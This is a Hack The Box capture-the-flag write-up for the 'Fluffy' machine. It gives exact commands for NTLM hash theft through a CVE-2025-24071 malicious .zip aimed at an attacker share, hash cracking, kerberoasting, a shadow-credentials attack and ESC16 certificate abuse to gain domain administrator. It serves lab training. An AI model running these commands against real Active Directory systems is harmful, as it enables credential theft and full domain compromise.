HTB - FLUFFY - JA Smith

# TAKEAWAYS - Fixing clock skew with `rdate` to sync with DC ```bash sudo rdate -n DC_IP COMMAND ``` - If above does not work, try `faketime` ```bash ntpdate -q DC_IP faketime "INSERT_TIME_FROM_ABOVE" COMMAND faketime "$(ntpdate -q DC_IP | cut -d ' ' -f 1,2)" COMMAND ``` - Enumerate ADCS ```bash nxc ldap DC_IP -u winrm_svc -H NThash -d domain -M adcs ``` - Enumerate ADCS vulns ```bash certipy-ad find -u username -hashes hash -dc-ip 10.129.4.254 -ns 10.129.4.254 -vulnerable -stdout ``` --- # Discover Ports & Services - add given creds to `creds.txt` for easy reference - `ping` test ![[images/Pasted image 20260314153652.png]] - `nmap` scan - light ![[images/Pasted image 20260314153956.png]] - Looks like a DC b/c dns, kerberos, ldap, winrm are open - `nmap` scan - detailed ![[images/Pasted image 20260314154212.png]] - NOTE: large clock skew ![[images/Pasted image 20260314154444.png]] - NOTE: SMB signing enabled and required ![[images/Pasted image 20260314154903.png]] - visualize `nmap` scan ![[images/Pasted image 20260314154940.png]] ```bash xlstproc input.xml -o output.html ``` --- # Port 445: SMB Enum - Null auth works but we cannot list shares ![[images/Pasted image 20260314155157.png]]![[images/Pasted image 20260314160316.png]] - Add `fluffy.htb` and `DC01.fluffy.htb` to `/etc/hosts` - Try with given creds ![[images/Pasted image 20260314202229.png]] - Clearly the IT share is the next to look into as it's a non-default share - Connect to IT share with `smbclient` ![[images/Pasted image 20260314202419.png]] - Few interesting files here > Let's grab it all with `mget *` ![[images/Pasted image 20260314202522.png]] - `UpgradeNotice.pdf` notes some critical CVEs that will be patched soon ![[images/Pasted image 20260315170657.png]] - Google the two critical and two high CVEs - CVE-2025-24996 NTLM hash disclosure relating to spoofing attacks - CVE-2025-24071 NTLM hash disclosure following RAR/ZIP extraction - NOTE: I am able to PUT a file into the IT share - CVE-2025-46785 is related to the Zoom app - CVE-2025-29968 is related to ADCS - After unziping `Everything[xxx].zip` and `KeePass[xxx].zip`, I only see executables and related files ![[images/Pasted image 20260314202959.png]] - Only return to this if we are at a dead-end --- # Exploit CVE-2025-24071 - Startup `responder` ![[images/Pasted image 20260314205106.png]] - Create a `.zip` file with a `.library-ms` file that points to `\\attacker-ip\shared` ![[images/Pasted image 20260314205837.png]] - and PUT into the IT share > no hits on responder ![[images/Pasted image 20260314210546.png]] - Let's try this tool: [CVE-2025-24071/exploit.py at main · ThemeHackers/CVE-2025-24071](https://github.com/ThemeHackers/CVE-2025-24071/blob/main/exploit.py) - Above tool creates the malicious `.zip` for us with `exploit.py` ![[images/Pasted image 20260314210749.png]] - PUT `exploit.zip` via `smbclient` > we have a hit on `responder` with the NTLMv2 hash for `p.agila`![[images/Pasted image 20260314211345.png]] ![[images/Pasted image 20260314210945.png]] - copy this hash to `p.agila.hash` and attempt to crack with `hashcat -m 5600` > cracked! ![[images/Pasted image 20260314211208.png]] - create new entry for in `creds.txt` for `p.agila` --- # Enum with `p.agila` ## SMB and RPC Enum - Enumerate available shares > same as initial user ![[images/Pasted image 20260314211714.png]] - Try to find more users with `nxc` ![[images/Pasted image 20260314211914.png]] - Enumerate domain users with `rpcclient` ![[images/Pasted image 20260314212147.png]] - Enumerate privs > no output ```bash nxc smb 10.129.232.88 -u <USERNAME> -p <PASSWORD> -X "whoami /priv" ``` - Try with `evil-winrm` > getting an error ![[images/Pasted image 20260314212704.png]] ## Bloodhound enum - Let's run `bloodhound` - Run ingestor ![[images/Pasted image 20260314213109.png]] - Startup GUI container ![[images/Pasted image 20260314213115.png]] - Keep getting ingestion canceled ![[images/Pasted image 20260314214228.png]] - try `bloodhound.py` with `-c all --zip` option ![[images/Pasted image 20260314215224.png]] - that seems to work![[images/Pasted image 20260314215244.png]] - `p.agila` is a member of `SERVICE ACCOUNT MANAGERS` and has outbound object control over `SERVICE ACCOUNTS` ![[images/Pasted image 20260314215457.png]] - `SERVICE ACCOUNTS` has GenricWrite over `CA_SVC` and others![[images/Pasted image 20260314215550.png]] - `CA_SVC` is a member of `CERT PUBLISHERS` who is a member of the `DENIED RODC PASSWORD REPLICATION GROUP`![[images/Pasted image 20260315151756.png]] - RODC = read-only domain controllers --- # Kerberoating - Since SERVICE ACCOUNTS has GenericWrite over the `WINRM_SVC` account we can perform a targeted kerberoasting attack ![[images/Pasted image 20260314220720.png]] - Try using `GetUserSPNs.py` ![[images/Pasted image 20260314221036.png]] - Clock skew too great - Install `rdate` and run ```bash sudo apt install rdate sudo rdate -n DC_IP ``` - Clock skew is still too great - Try using `faketime` ```bash sudo apt install faketime ntpdate -q 10.129.232.88 faketime "2026-03-15 05:16:26" GetUserSPNs.py -dc-ip 10.129.232.88 fluffy.htb/p.agila -request-user winrm_svc -outputfile winrm_svc.hash #based on output from above ``` - This gives us TGS tickets for `LDAP_SVC`, `CA_SVC`, `WINRM_SVC` ![[images/Pasted image 20260314221956.png]] - Output to `svc.hash` and try to crack with `hashcat -m 13100` - exhausted --- # Shadow Creds Attack - Try shadow creds attack based on bloodhound hints above - First, add `p.agila` to SERVICE ACCOUNTS ```bash BloodyAD -u p.agila -p <password> -d fluffy.htb --host TARGET add groupMember "service accounts" p.agila ``` ![[images/Pasted image 20260315152449.png]] - Next, extract NT hashes for `winrm_svc` and `ca_svc` with shadow creds attacks - That works! > Note: The membership for `p.agila` seems to be clearing every several minutes so the above `bloodAD` command may need to be redone - Save hashes to `services.hash` ```bash faketime "$(ntpdate -q DC_IP | cut -d ' ' -f 1,2)" certipy-ad shadow auto -username [email protected] -password <password> -account winrm_svc faketime "$(ntpdate -q DC_IP | cut -d ' ' -f 1,2)" certipy-ad shadow auto -username [email protected] -password <password> -account ca_svc ``` - Finally, perform a PtH to connect to `DC01.fluffy.htb` as `winrm_svc` with `evil-winrm` - `type \users\winrm_svc\desktop\user.txt` --- # Enumerate ADCS - Enumerate ADCS info with `nxc` ```bash nxc ldap DC_IP -u winrm_svc -H NThash -d fluffy.htb -M adcs ``` ![[images/Pasted image 20260315155519.png]] - Enumerate ADCS vulns with `certipy-ad` - Below we see that that `DC01.fluffy.htb` is vulnerable to an ESC16 exploit b/c security extension `1.3.6.1.4.1.311.25.2` is disabled ```bash faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad find -u ca_svc -hashes hash -dc-ip 10.129.4.254 -ns 10.129.4.254 -vulnerable -stdout ``` ![[images/Pasted image 20260315162947.png]] --- # Exploit ESC16 Vulnerability - See https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally ## Sequence of Steps - Step 1: Read initial UPN of the victim account ```bash faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad account -u [email protected] -p "password" -dc-ip 10.129.4.254 -ns 10.129.4.254 -user ca_svc read ``` ![[images/Pasted image 20260315164300.png]] - Step 2: Update the victim account's UPN to the target administrator's `sAMAccountName` ```bash faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad account -u [email protected] -p "password" -dc-ip 10.129.4.254 -ns 10.129.4.254 -upn administrator -user ca_svc update ``` ![[images/Pasted image 20260315164506.png]] - Step 3: Request a certificate as the "victim" user from any suitable client authentication template ```bash export KRB5CCNAME=ca_svc.ccache faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad req -u ca_svc -hashes "hash" -dc-ip 10.129.4.254 -target dc01.fluffy.htb -ca 'fluffy-dc01-ca' -template 'User' ``` ![[images/Pasted image 20260315165435.png]] - Step 4: Revert the "victim" account's UPN ```bash faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad account update -u [email protected] -p "password" -dc-ip 10.129.4.254 -ns 10.129.4.254 -upn "[email protected]" -user ca_svc ``` ![[images/Pasted image 20260315165719.png]] - Step 5: Authenticate as the target administrator - Got it! ```bash faketime "$(ntpdate -q dc01.fluffy.htb | cut -d ' ' -f 1,2)" certipy-ad auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.4.254 -ns 10.129.4.254 ``` ![[images/Pasted image 20260315165905.png]] - Perform a PtH to connect to `DC01.fluffy.htb` as `administrator` with `evil-winrm` - `type \users\administrator\desktop\root.txt` ![[images/Pasted image 20260315170109.png]]